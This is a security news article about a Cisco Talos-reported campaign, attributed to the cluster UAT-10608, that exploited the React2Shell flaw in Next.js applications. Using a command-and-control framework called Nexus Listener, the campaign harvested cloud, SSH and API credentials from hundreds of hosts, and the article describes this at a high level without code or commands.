Hackers Exploit React2Shell in Automated Credential Theft Campaign

Hackers exploit React2Shell in automated credential theft campaign

A large-scale intrusion campaign has been uncovered that leverages the React2Shell vulnerability (CVE-2025-55182) to automatically breach vulnerable Next.js applications and harvest credentials. The operation appears to be highly automated, targeting a broad set of cloud-hosted environments. In a span of one day, attackers managed to compromise at least 766 hosts across multiple cloud providers and regions, collecting a wide range of sensitive data.

Central to the campaign is a framework known as Nexus Listener. Once a vulnerable Next.js instance is detected, an automated script is deployed into the system’s temporary directory. This script runs through a multi-phase credential-harvesting routine, designed to extract and exfiltrate secrets from the compromised environment. The attackers then relay stolen data back to a command-and-control (C2) server that runs the Nexus Listener component, allowing operators to inspect results with built-in search, filters, and statistics.

Cisco Talos researchers describe the operators behind the activity as a threat cluster tracked as UAT-10608. Their investigation revealed that an exposed Nexus Listener instance was accessible and vulnerable to exploitation, enabling them to observe the data being harvested and gain insight into how the web application managed its internal processes. Visual representations of the operation—such as a Nexus Listener dashboard—show the scope of the campaign, including the uptime of the harvesting framework and the aggregate tally of each credential type extracted from compromised hosts.

Automated secret harvesting begins with scanning for vulnerable Next.js deployments. When a target is found, the React2Shell exploit is used to plant the harvesting routine. The data exfiltrated spans a broad spectrum of sensitive information, including environment variables and secrets (API keys, database credentials, and GitHub/GitLab tokens), SSH private keys, cloud credentials (AWS/GCP/Azure metadata and IAM credentials), Kubernetes tokens, Docker/container details, command history, and broader process and runtime data. This information is transferred in chunks via HTTP on port 8080 to the C2 server, where the attackers can view and analyze the harvested data.

According to the reporting, the attack’s scale was notable: 766 hosts compromised within a single 24-hour period. The campaign’s data collection aims to enable cloud account takeover, access to databases and payment systems, and even lateral movement within networks via SSH keys. In addition to the operational risks, the exposure of personal data among the stolen secrets carries potential privacy and regulatory implications for affected organizations.

The campaign’s workflow also reveals that the attackers could parse and summarize the harvested data: a listing of compromised hosts, counts by credential type, and insight into the system’s uptime—all suggesting a mature, self-service interface intended to maximize extraction efficiency. The combination of automated exploitation, centralized data aggregation, and a scalable harvesting framework underscores the growing threat of automated credential theft against modern web applications built with Next.js.

As the security community continues to map the UAT-10608 operation, the focus remains on understanding how such tools are deployed, how they locate exposed targets, and how dashboards like Nexus Listener facilitate rapid data collection and analysis. The incident highlights the persistence of credential-stealing campaigns in cloud-centric environments and the ongoing importance of monitoring, timely patching, and robust credential hygiene to reduce exposure to vulnerabilities like React2Shell.